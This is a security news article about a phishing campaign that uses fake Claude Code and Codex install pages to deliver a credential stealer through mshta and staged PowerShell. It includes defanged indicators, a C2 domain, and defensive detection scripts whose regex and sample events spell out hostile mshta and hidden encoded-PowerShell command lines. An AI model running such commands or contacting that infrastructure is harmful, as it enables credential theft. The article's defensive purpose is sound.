Fake Claude Code and Codex Install Pages on Google Sites Push Credential-Stealing Malware


A new ClickFix-style phishing campaign is impersonating Claude Code and OpenAI Codex to trick developers into running malicious setup instructions. The attack uses Google Sites pages that look like legitimate installation guides, then pushes victims into launching a Windows command that starts a credential-stealing malware chain.

ANY.RUN flagged one Claude-themed lure as malicious in its sandbox analysis, with the page hosted at sites.google.com/view/clau-ver-un-24 and tagged as ClickFix phishing. The campaign targets users who already expect AI coding tools to involve terminal-based setup steps.

The risk is serious because the malware does not rely on a normal downloaded installer. Instead, the victim follows what appears to be a setup instruction, and the attack chain moves into script-based execution that can steal browser data, email credentials, cryptocurrency wallet data, and other sensitive information.

How The Fake Claude Code Installer Attack Works

The campaign uses trusted-looking Google Sites pages to mimic installation pages for developer tools. This makes the lure more convincing because the visible hosting domain belongs to Google, even though the content on the page does not come from Anthropic or OpenAI.

From there, victims are instructed to run a command through Windows utilities. The public ANY.RUN campaign post says the chain uses a user-executed mshta step, multi-stage PowerShell delivery, steganographic payload extraction from an image, in-memory shellcode execution, and exfiltration to attacker-controlled infrastructure.

This approach works because developers often copy terminal commands from documentation. Attackers abuse that habit by making the page look like a routine installation guide instead of a malware delivery page.

Key Details At A Glance

Campaign type              ClickFix social engineering attack
Main lure                  Fake Claude Code and OpenAI Codex installation pages
Hosting abuse              Google Sites pages used to increase trust
Initial execution method   User is told to run a Windows command
Notable tools abused       mshta.exe and powershell.exe
Payload behavior           In-memory stealer execution using staged scripts
Data at risk               Browser credentials, email data, and cryptocurrency wallet information

Why AI Coding Tools Make The Lure More Believable

Claude Code and Codex are both real developer tools, and both run from a terminal. That gives attackers a believable cover story when they ask users to paste commands into PowerShell, Command Prompt, or another command-line interface.

Anthropic’s Claude Code quickstart explains that Claude Code works through a terminal and supports several installation methods. OpenAI’s Codex CLI documentation similarly describes Codex as a local terminal-based coding agent that can read, edit, and run code in a selected directory.

That normal developer workflow creates a security gap. A user may trust a command because it resembles real documentation, even when the page itself comes from an unrelated domain or a sponsored search result.

ClickFix Attacks Turn User Trust Into Execution

ClickFix attacks rely on social engineering rather than a traditional software exploit. The attacker convinces the victim to copy and run a command that appears to fix a problem, verify access, or complete an installation.

Trend Micro described a related InstallFix campaign involving fake Claude AI installer pages, Google Ads promotion, malicious PowerShell instructions, mshta.exe abuse, obfuscated scripts, and fileless payload delivery.

The method is effective because the victim performs the most important step for the attacker. Nothing is saved to disk as an installer, and the first stage is mshta.exe, a signed Windows binary, so the browser download warnings and file scans that would stop a malicious installer never get a chance to run; the later stages execute in memory under powershell.exe.

Steganography And In-Memory Execution Reduce Visibility

ANY.RUN’s public analysis says the campaign hides part of the payload inside an image and extracts it only during execution. This technique, known as steganography, can reduce obvious file artifacts and make detection harder for teams that rely mainly on static file scanning.
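The article says only that part of the payload is hidden in an image and pulled out at run time, not how it was embedded. The check below is an added example, not code from the article or ANY.RUN. It covers the simplest variant, bytes appended after the PNG IEND chunk, which an image viewer ignores but a loader can carve out, and it reports the entropy of the trailing bytes, since encrypted or compressed payloads sit near 8 bits per byte. The embedding method is an assumption; least-significant-bit embedding inside pixel data would pass this check and needs a different test. The sample image is constructed in code.

```python
"""Structural check for data hidden after a PNG's IEND chunk.

Added example, not from the article or ANY.RUN. The article does not say how
the payload was embedded in the image; appending data after IEND is one common
variant and is what this check looks for (an assumption). LSB-style embedding
inside pixel data will not trip it. The sample PNG is constructed below.
"""
import math
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunks(data: bytes):
    """Walk the chunk list; return ([(type, length, crc_ok)], bytes_after_iend)."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    chunks = []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(body) < length or len(crc) < 4:
            raise ValueError("truncated chunk")
        crc_ok = (zlib.crc32(ctype + body) & 0xFFFFFFFF) == struct.unpack(">I", crc)[0]
        chunks.append((ctype.decode("ascii"), length, crc_ok))
        pos += 12 + length
        if ctype == b"IEND":
            # Everything after IEND is ignored by decoders: that is where appended payloads live.
            return chunks, data[pos:]
    raise ValueError("no IEND chunk")


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte; 8.0 means every byte value is equally likely (encrypted/compressed)."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def inspect_png(data: bytes) -> dict:
    """Summarise chunk layout, CRC errors and any trailing data for one file."""
    chunks, trailing = png_chunks(data)
    return {
        "chunks": [c[0] for c in chunks],
        "crc_errors": [c[0] for c in chunks if not c[2]],
        "trailing_bytes": len(trailing),
        "trailing_entropy": round(shannon_entropy(trailing), 2),
        "suspicious": len(trailing) > 0,
    }


def make_chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF)


def build_sample_png(appended: bytes = b"") -> bytes:
    """Constructed 1x1 grayscale PNG, optionally with bytes appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # width, height, bit depth, grayscale
    idat = zlib.compress(b"\x00\x00")                    # filter byte + one pixel
    return PNG_SIG + make_chunk(b"IHDR", ihdr) + make_chunk(b"IDAT", idat) + make_chunk(b"IEND", b"") + appended


if __name__ == "__main__":
    print(inspect_png(build_sample_png()))
    print(inspect_png(build_sample_png(bytes(range(256)))))  # constructed "payload"
```

Run it over the images a suspicious PowerShell stage fetched (the URL or path is in the command line or proxy log). A clean file reports zero trailing bytes; a file with a few kilobytes of high-entropy data after IEND deserves a closer look, and a CRC error on a chunk suggests someone edited the file by hand.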

The ANY.RUN report also shows the Google Sites lure receiving a malicious verdict and ClickFix-related detection tags. That is consistent with the sequence described above: social engineering first, then script-based execution only after the user acts, which is why the lure page itself contains nothing for a scanner to flag.

Because the activity runs through powershell.exe, which is signed, present on every Windows host, and used constantly by administrators, allow-listing by process name or file hash gives no protection, and some network and endpoint tools will treat parts of the traffic as routine administrative activity. The distinguishing signal is the lineage (the shell or dialog the user pasted the command into spawning mshta.exe, which in turn spawns powershell.exe) together with the command-line arguments, so defenders need behavioral rules that detect suspicious process chains, not just known malware files.

Why Developers Face Higher Risk

Developers, security researchers, and AI power users frequently install command-line tools. They also work with API keys, Git credentials, package registry tokens, cloud access tokens, SSH keys, and cryptocurrency wallets.

That makes developer machines high-value targets. A single infected workstation can expose personal accounts, work credentials, source code access, cloud environments, and private project data.

The fake pages also benefit from timing. Claude Code, Codex, and similar AI coding agents have become common enough that many users search for installation instructions, compare guides, and follow steps quickly without checking every source.

Indicators And Infrastructure Reported Publicly

Type     Indicator                               Description
URL      sites.google.com/view/clau-ver-un-24    Claude-themed Google Sites lure
URL      sites.google.com/view/cdx-biz-ver-24    Codex-themed Google Sites lure reported by ANY.RUN
Domain   fairpoint29[.]com                       Claude embedded lure domain reported by ANY.RUN
Domain   fluxforge97[.]com                       Claude embedded lure domain reported by ANY.RUN
Domain   freshbase11[.]com                       Codex embedded lure domain reported by ANY.RUN
Domain   wiseview58[.]com                        Codex embedded lure domain reported by ANY.RUN
C2       enhanceblabber[.]cc                     Command-and-control domain reported by ANY.RUN
Process  mshta.exe                               Windows utility abused in the initial execution chain
Process  powershell.exe                          Used for staged delivery and in-memory activity

Security teams should treat these indicators as a starting point, not a complete detection strategy. Attackers can rotate domains quickly, especially when they rely on social engineering and trusted hosting platforms.
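To put the table to use, the script below, an added example rather than ANY.RUN's or the article's code, refangs the indicators exactly as printed above and matches them against proxy log lines. The log format and the lines themselves are constructed for illustration, so a real deployment needs its own field mapping. Subdomain matching is deliberate: an attacker who controls a domain can serve the lure from any host under it, and the sample includes a look-alike domain to show that the match is anchored on a dot rather than a plain suffix.

```python
"""Match the publicly reported indicators against proxy/DNS log lines.

Added example, not from the article or ANY.RUN. The indicator values are the
ones the article lists; the log format and the log lines are constructed.
"""
from urllib.parse import urlsplit

# Indicators as they appear in the article (defanged with [.]).
REPORTED_DOMAINS = [
    "fairpoint29[.]com",
    "fluxforge97[.]com",
    "freshbase11[.]com",
    "wiseview58[.]com",
    "enhanceblabber[.]cc",
]
REPORTED_URLS = [
    "sites.google.com/view/clau-ver-un-24",
    "sites.google.com/view/cdx-biz-ver-24",
]

# Constructed proxy log: timestamp, client, URL, status. docs.example.com is a benign placeholder.
SAMPLE_PROXY_LOG = [
    "10:00:00Z 10.0.0.5 https://sites.google.com/view/clau-ver-un-24 200",
    "10:00:02Z 10.0.0.5 https://cdn.fairpoint29.com/setup.png 200",
    "10:00:03Z 10.0.0.5 https://docs.example.com/claude-code/quickstart 200",
    "10:00:05Z 10.0.0.5 http://enhanceblabber.cc/gate 200",
    "10:00:09Z 10.0.0.7 https://notfairpoint29.com/ 200",
]


def refang(indicator: str) -> str:
    """Turn the defanged form ('example[.]com', 'hxxp://') back into a usable value."""
    return (indicator.replace("[.]", ".")
                     .replace("hxxps://", "https://")
                     .replace("hxxp://", "http://"))


def hostname_of(url: str) -> str:
    """Hostname of a URL that may or may not carry a scheme."""
    return (urlsplit(url if "://" in url else "http://" + url).hostname or "").lower()


def domain_matches(host: str, bad_domain: str) -> bool:
    """True when host is bad_domain or a subdomain of it; notbad.com must not match bad.com."""
    host = host.lower().rstrip(".")
    return host == bad_domain or host.endswith("." + bad_domain)


def url_path_matches(url: str, bad_url: str) -> bool:
    """Compare host+path, ignoring scheme and query, so http/https variants both match."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    candidate = parts.netloc.lower() + parts.path.rstrip("/")
    return candidate == bad_url.rstrip("/")


def scan_proxy_log(lines):
    """Return (line_no, matched_indicator) for each line that hits an indicator.

    Assumes whitespace-separated fields with the URL in the third position (constructed format).
    """
    bad_domains = [refang(d) for d in REPORTED_DOMAINS]
    bad_urls = [refang(u) for u in REPORTED_URLS]
    hits = []
    for n, line in enumerate(lines, 1):
        fields = line.split()
        if len(fields) < 3:
            continue
        url = fields[2]
        host = hostname_of(url)
        matched = next((d for d in bad_domains if domain_matches(host, d)), None)
        if matched is None:
            matched = next((u for u in bad_urls if url_path_matches(url, u)), None)
        if matched is not None:
            hits.append((n, matched))
    return hits


if __name__ == "__main__":
    for line_no, indicator in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"line {line_no}: {indicator}")
```

A hit on a lure URL or embedded domain means a user reached the page, not that the chain ran; a hit on the C2 domain from a workstation is the one that should page someone. Either way, pair the match with the endpoint's process telemetry before deciding how far the infection got.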

How To Install Claude Code And Codex Safely

Users should only follow installation steps from official documentation or verified repositories. For Claude Code, users should start with the official Anthropic quickstart guide. For Codex, users should use the official OpenAI Codex CLI page or the linked OpenAI GitHub repository.

Search ads, copied snippets, forum posts, and unofficial setup pages should not be trusted by default. This matters even more when a page asks the user to paste a command into PowerShell, Terminal, or Command Prompt.

  • Open official documentation manually instead of clicking sponsored results.
  • Check the address bar before running any install step: a Google Sites page is hosted by Google, not by Anthropic or OpenAI, however trustworthy the domain looks.
  • Do not run commands from Google Sites, paste pages, forums, or random blogs.
  • Evaluate unfamiliar developer tools in a test VM or sandbox first.
  • Keep endpoint protection enabled during installations.
  • Rotate exposed API keys and tokens after any suspicious command execution.
  • Review shell history (PSReadLine's ConsoleHost_history.txt for PowerShell) and the Run dialog history (the RunMRU registry key) for unknown install commands; a command pasted into the Run dialog never reaches the PowerShell history.

What Organizations Should Monitor

Companies should look for suspicious parent-child process relationships involving browsers, mshta.exe, powershell.exe, script hosts, and network connections to newly registered or low-reputation domains.
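The chain described earlier (a user-run mshta.exe step, then multi-stage PowerShell) is what this monitoring advice translates into. The detector below is an added example, not code from the article, ANY.RUN, or Trend Micro. It takes process-creation events in a simplified Sysmon Event ID 1 shape, rebuilds each process's lineage, and flags the relationships the article names: a browser or the Run dialog spawning a script host, a browser spawning a shell, powershell.exe descending from mshta.exe, and PowerShell arguments typical of staged in-memory delivery. The sample events, the lure URL inside them, and the argument patterns are constructed assumptions a team would tune to its own telemetry.

```python
"""Behavioral detection for the ClickFix process chain described in the article.

Added example, not code from the article, ANY.RUN or Trend Micro. Events use a
simplified Sysmon Event ID 1 shape (pid, ppid, image, cmdline). The sample
events, the hypothetical lure URL and the argument patterns are constructed.
"""
import re

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
USER_LAUNCHERS = BROWSERS | {"explorer.exe"}   # explorer.exe is also the parent of Win+R commands
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SHELLS = POWERSHELL | {"cmd.exe"}

# Argument patterns (assumed, tune locally) seen in staged, fileless PowerShell delivery.
SUSPICIOUS_PS_ARGS = re.compile(
    r"(?i)("
    r"-e(nc|ncodedcommand)?\s"            # encoded command
    r"|-w(indowstyle)?\s+hidden"          # hidden window
    r"|-nop(rofile)?\b"                   # skip profile
    r"|-e(p|xecutionpolicy)\s+bypass"     # policy bypass
    r"|invoke-expression|\biex\b"         # in-memory evaluation
    r"|downloadstring|frombase64string"   # staged fetch / decode
    r"|\.(png|jpe?g|gif)\b"               # payload pulled from an image (steganography stage)
    r")"
)

# Constructed events. The URL is hypothetical, not an indicator from the article.
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 1,    "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 2000, "ppid": 1000, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "cmdline": "chrome.exe"},
    {"pid": 2100, "ppid": 2000, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c echo hi"},
    {"pid": 3000, "ppid": 1000, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://setup.example.invalid/claude-code"},
    {"pid": 3100, "ppid": 3000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc AAAA"},
    {"pid": 4000, "ppid": 1000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\dev\build.ps1"},   # ordinary developer use, must stay quiet
    {"pid": 5000, "ppid": 2000, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def build_tree(events):
    return {e["pid"]: e for e in events}


def ancestors(tree, pid, max_hops=4):
    """Image basenames of the parents of pid, nearest first, up to max_hops."""
    out = []
    cur = tree.get(pid)
    for _ in range(max_hops):
        if cur is None:
            break
        parent = tree.get(cur["ppid"])
        if parent is None or parent["pid"] == cur["pid"]:
            break
        out.append(basename(parent["image"]))
        cur = parent
    return out


def detect_clickfix_chain(events):
    """Return (pid, rule, detail) tuples for events matching the chain in the article."""
    tree = build_tree(events)
    alerts = []
    for ev in events:
        img = basename(ev["image"])
        cmd = ev.get("cmdline", "")
        chain = ancestors(tree, ev["pid"])
        parent = chain[0] if chain else None
        lineage = " -> ".join(list(reversed(chain)) + [img])
        if img in SCRIPT_HOSTS and parent in USER_LAUNCHERS:
            alerts.append((ev["pid"], "user-launched-script-host", lineage))
        if img in SHELLS and parent in BROWSERS:
            alerts.append((ev["pid"], "browser-spawned-shell", lineage))
        if img in POWERSHELL and "mshta.exe" in chain:
            alerts.append((ev["pid"], "mshta-spawned-powershell", lineage))
        if img in POWERSHELL and SUSPICIOUS_PS_ARGS.search(cmd):
            alerts.append((ev["pid"], "suspicious-powershell-args", cmd))
    return alerts


if __name__ == "__main__":
    for pid, rule, detail in detect_clickfix_chain(SAMPLE_EVENTS):
        print(f"{pid}\t{rule}\t{detail}")
```

The explorer.exe to powershell.exe event with a plain -File argument produces nothing, which is the point: developers open PowerShell all day, and a rule that fires on that would be switched off within a week. The rules key on mshta.exe in the lineage and on the argument shape instead, and the same lineage logic applies to network events once you join them on process id, so a powershell.exe whose grandparent is mshta.exe connecting to a newly registered domain can be scored higher than either signal alone.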

The ANY.RUN IoC post lists multiple lure and infrastructure domains, while Trend Micro’s Claude Code InstallFix research shows how similar campaigns use fileless delivery, evasion, and attacker-controlled command-and-control servers.

Defenders should also create policies around command-line installs for developer tools. Blocking every script would disrupt engineering teams, but unmanaged copy-paste installation from unknown pages creates unnecessary risk. A practical middle ground is to block or alert on mshta.exe for users who have no need for it, turn on PowerShell script block logging so the decoded stages are recorded, and point developers at an internal mirror or documented install path for tools such as Claude Code and Codex.

FAQ

What is the fake Claude Code installer campaign?

It is a ClickFix-style malware campaign that impersonates Claude Code and OpenAI Codex installation pages. Victims are directed to fake setup pages and told to run commands that start a credential-stealing malware chain.

Why does the campaign use Google Sites?

Google Sites gives the lure a trusted-looking hosting domain. Attackers abuse that trust to make a fake installation page look safer than a random domain would.

What data can this malware steal?

The campaign targets sensitive data such as saved browser credentials, email data, cryptocurrency wallet information, and other valuable account or device data available on the victim’s machine.

How can users avoid fake Claude Code or Codex installers?

Users should open official Anthropic or OpenAI documentation directly, avoid sponsored or unfamiliar setup pages, and never paste terminal commands from pages they have not verified.

What should someone do after running a suspicious installer command?

They should disconnect the device from the network, preserve evidence, scan the system, rotate passwords and API keys from a clean device, review account activity, and ask their security team to check for suspicious PowerShell or mshta activity.
